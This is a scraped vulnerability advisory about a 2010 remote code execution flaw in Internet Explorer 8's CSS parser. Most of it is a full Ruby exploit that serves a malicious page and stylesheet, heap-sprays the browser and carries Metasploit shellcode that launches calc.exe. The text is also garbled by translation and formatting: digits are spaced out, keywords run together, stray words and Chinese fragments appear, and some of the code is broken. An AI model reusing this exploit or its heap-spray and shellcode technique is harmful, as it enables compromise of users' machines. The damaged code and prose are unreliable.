Internet Explorer 8 CSS parsing vulnerability-vulnerability warning-the black bar safety net

2010-12-20T00:00:00
ID MYHACK58:62201028622
Type myhack58
Reporter 佚名
Modified 2010-12-20T00:00:00

Description

Internet Explorer 8 is Microsoft launched a web browser, Internet Explorer 8 in parsing css when the presence of vulnerabilities may lead to remote code execution. This vulnerability was originally tick: the http://www.wooyun.org/bugs/wooyun-2010-0885 以 拒绝 服务 漏洞 报 给 exploit-db to: http://www.exploit-db.com/exploits/15708/的 and was later a foreigner analysis and shows the use of the code, to prove that the vulnerability is a remote code execution vulnerability. Foreigners to the vulnerability detailed analysis, and the use of the code can be found in: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/, article title: When A DoS Isn't A DoS.

[+]info: ~~~~~~~~~ Internet Explorer 8 CSS Parser Exploit

[+]poc: ~~~~~~~~~

view source

print?

| 0 0 1 | #!/ usr/bin/env ruby ---|---

0 0 2 | ---|---

0 0 3 | # Source: <http://www.breakingpointsystems.com/community/blog/ie-vulnerability/> ---|---

0 0 4 | # Author: Nephi Johnson (d0c_s4vage) ---|---

0 0 5 | ---|---

0 0 6 | require'socket" ---|---

0 0 7 | ---|---

0 0 8 | def http_send(sock, data, opts={}) ---|---

0 0 9 | defaults = {:code=>"2 0 0", :message=>"OK", :type=>"text/html"} ` ---|---

0 1 0 | opts = defaults. merge(opts) ` ---|---

0 1 1 | ---|---

0 1 2 | code = opts[:code] ` ---|---

0 1 3 | message = opts[:message] ` ---|---

0 1 4 | type = opts[:type] ` ---|---

0 1 5 | ---|---

0 1 6 | to_send = "HTTP/1.1 #{code} #{message}\r\n" + ---|---

0 1 7 | "Date: Mon, 1 1 Dec 2 0 1 0 1 4:2 0:2 3 GMT\r\n"+ ` ---|---

0 1 8 | "Cache-Control: no-cache\r\n"+ ` ---|---

0 1 9 | "Content-Type: #{type}\r\n"+ ` ---|---

0 2 0 | "Pragma: no-cache\r\n"+ ` ---|---

0 2 1 | "Content-Length: #{data. length}\r\n\r\n"+ ` ---|---

0 2 2 | "#{data}"` ---|---

0 2 3 | puts "[+] Sending:" ---|---

0 2 4 | to_send. split("\n").each do |line| ---|---

0 2 5 | puts " #{line}" ---|---

0 2 6 | end` ---|---

0 2 7 | sock. write(to_send) rescue return false ---|---

0 2 8 | returntrue` ---|---

0 2 9 | end ---|---

0 3 0 | ---|---

0 3 1 | def sock_read(sock, out_str, timeout=5) ---|---

0 3 2 | begin` ---|---

0 3 3 | ifKernel. select([sock],[],[],timeout) ` ---|---

0 3 4 | out_str. replace(sock. recv(1 0 2 4)) ` ---|---

0 3 5 | puts "[+] Received:" ---|---

0 3 6 | out_str. split("\n").each do |line| ---|---

0 3 7 | puts " #{line}" ---|---

0 3 8 | end` ---|---

0 3 9 | else` ---|---

0 4 0 | sock. close ` ---|---

0 4 1 | returnfalse` ---|---

0 4 2 | end` ---|---

0 4 3 | rescueException is=> ex ` ---|---

0 4 4 | returnfalse` ---|---

0 4 5 | end` ---|---

0 4 6 | end ---|---

0 4 7 | ---|---

0 4 8 | def to_uni(str) ---|---

0 4 9 | res = "" ---|---

0 5 0 | str. each_byte do in |b| ---|---

0 5 1 | res << "\x00#{b. chr}" ---|---

0 5 2 | end` ---|---

0 5 3 | res ` ---|---

0 5 4 | end ---|---

0 5 5 | ---|---

0 5 6 | @css_name ="\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"` ---|---

0 5 7 | @html_name ="test.html"` ---|---

0 5 8 | placeholder ="a"* (@css_name. length/2) ` ---|---

0 5 9 | ---|---

0 6 0 | @html = &lt;&lt;-HTML` ---|---

0 6 1 | <script> ` ---|---

0 6 2 | function dup_str(str, length) { ` ---|---

0 6 3 | var res = str; ` ---|---

0 6 4 | while(res. length &lt; length) { ---|---

0 6 5 | res += res; ` ---|---

0 6 6 | } ` ---|---

0 6 7 | res = res. substr(res. length - length); ` ---|---

0 6 8 | returnres; ` ---|---

0 6 9 | } ` ---|---

0 7 0 | ---|---

0 7 1 | function to_bin(str) { ` ---|---

0 7 2 | var res = ""; ` ---|---

0 7 3 | while(str. length &gt;0) { ---|---

0 7 4 | var first = str. substr(0``,2); ---|---

0 7 5 | var second = str. substr(2, 2); ` ---|---

0 7 6 | res += "%u" + second + first; ---|---

0 7 7 | str = (str. length > 4) ? str. substr(4) : ""; ` ---|---

0 7 8 | } ` ---|---

0 7 9 | returnunescape(res); ` ---|---

0 8 0 | } ` ---|---

0 8 1 | ---|---

0 8 2 | // first heap spray ` ---|---

0 8 3 | var base = dup_str(to_bin("0c0c0c0900000008000000730073030100000000010000730073030c"), 5 1 2+6); ` ---|---

0 8 4 | var arr = [] ` ---|---

0 8 5 | for(var i =0; i &lt;6 0 0 0 0; i++) { ---|---

0 8 6 | arr[i] = ["" + base]. join (""); ---|---

0 8 7 | } ` ---|---

0 8 8 | ---|---

0 8 9 | // second heap spray w/ shellcode ` ---|---

0 9 0 | var nops = dup_str(to_bin("0c0c0c0c"), 4 0 9 6+6); ` ---|---

0 9 1 | ---|---

0 9 2 | // windows/exec - 2 0 0 bytes ---|---

0 9 3 | // http://www.metasploit.com ` ---|---

0 9 4 | // EXITFUNC=process, CMD=calc.exe ` ---|---

0 9 5 | var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30" + ---|---

0 9 6 | "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031"+ ` ---|---

0 9 7 | "%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752"+ ` ---|---

0 9 8 | "%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a"+ ` ---|---

0 9 9 | "%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34"+ ` ---|---

1 0 0 | "%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475"+ ` ---|---

1 0 1 | "%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66"+ ` ---|---

1 0 2 | "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424"+ ` ---|---

1 0 3 | "%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86"+ ` ---|---

1 0 4 | "%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff"+ ` ---|---

1 0 5 | "%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c"+ ` ---|---

1 0 6 | "%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5"+ ` ---|---

1 0 7 | "%u6c61%u2e63%u7865%u0065"); ---|---

1 0 8 | var arr2 = []; ` ---|---

1 0 9 | for(var i =0; i &lt;3 0 0 0 0; i++) { ---|---

1 1 0 | arr2[i] = a [nops + shellcode]. join (""); ` ---|---

1 1 1 | } ` ---|---

1 1 2 | ---|---

1 1 3 | // write the link to the stylesheet ` ---|---

1 1 4 | var link = document. createElement("link"); ` ---|---

1 1 5 | link. setAttribute("rel", "Stylesheet"); ` ---|---

1 1 6 | link. setAttribute("type", "text/css"); ` ---|---

1 1 7 | link. setAttribute("href", "#{placeholder}") ` ---|---

1 1 8 | document. getElementsByTagName("head")[0]. appendChild(link); ` ---|---

1 1 9 | </script> ` ---|---

1 2 0 | HTML ---|---

1 2 1 | @html ="\xfe\xff"+ to_uni(@html) ` ---|---

1 2 2 | @html. gsub! (to_uni(placeholder), @css_name) ` ---|---

1 2 3 | ---|---

1 2 4 | @css = &lt;&lt;-CSS` ---|---

1 2 5 | @import and url("#{placeholder}"); ---|---

1 2 6 | @import and url("#{placeholder}"); ---|---

1 2 7 | @import and url("#{placeholder}"); ---|---

1 2 8 | @import and url("#{placeholder}"); ---|---

1 2 9 | CSS ---|---

1 3 0 | @css ="\xfe\xff"+ to_uni(@css) ` ---|---

1 3 1 | @css. gsub! (to_uni(placeholder), @css_name) ` ---|---

1 3 2 | ---|---

1 3 3 | @index = &lt;&lt;-INDEX` ---|---

1 3 4 | &lt;a href="#{@html_name}"&gt;#{@html_name}&lt;/a&gt; ---|---

1 3 5 | INDEX ---|---

1 3 6 | ---|---

1 3 7 | TCPServer. open(5 5 5 5 5)do|srv| ` ---|---

1 3 8 | whiletrue` ---|---

1 3 9 | cli = srv. accept ---|---1 4 0| req =""` ---|---

1 4 1 | html = "" ---|---

1 4 2 | css = "" ---|---

1 4 3 | index = "" ---|---

1 4 4 | nextunlesssock_read(cli, req, 5) ` ---|---

1 4 5 | whilereq. length > 0 ---|---

1 4 6 | ifreq =~ /GET/ ` ---|---

1 4 7 | ifreq =~ /GET.*# {The Regexp. escape(@html_name)}/ ---|---

1 4 8 | breakunlesshttp_send(cli, @html, :type=>"text/html") ` ---|---

1 4 9 | elsifreq =~ /GET.* index/ ` ---|---

1 5 0 | breakunlesshttp_send(cli, @index) ` ---|---

1 5 1 | elsifreq =~ /GET.*# {The Regexp. escape(@css_name)}/ ---|---

1 5 2 | breakunlesshttp_send(cli, @css, :type=>"text/css") ` ---|---

1 5 3 | else` ---|---

1 5 4 | breakunlesshttp_send(cli, @css, :type=>"text/css") ` ---|---

1 5 5 | end` ---|---

1 5 6 | elsifreq =~ /QUIT/ ` ---|---

1 5 7 | exit() ` ---|---

1 5 8 | end` ---|---

1 5 9 | req = "" ---|---

1 6 0 | nextunlesssock_read(cli, req, 5) ` ---|---

1 6 1 | end` ---|---

1 6 2 | cli. close the rescue next ---|---

1 6 3 | end` ---|---

1 6 4 | end ---|---

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/15746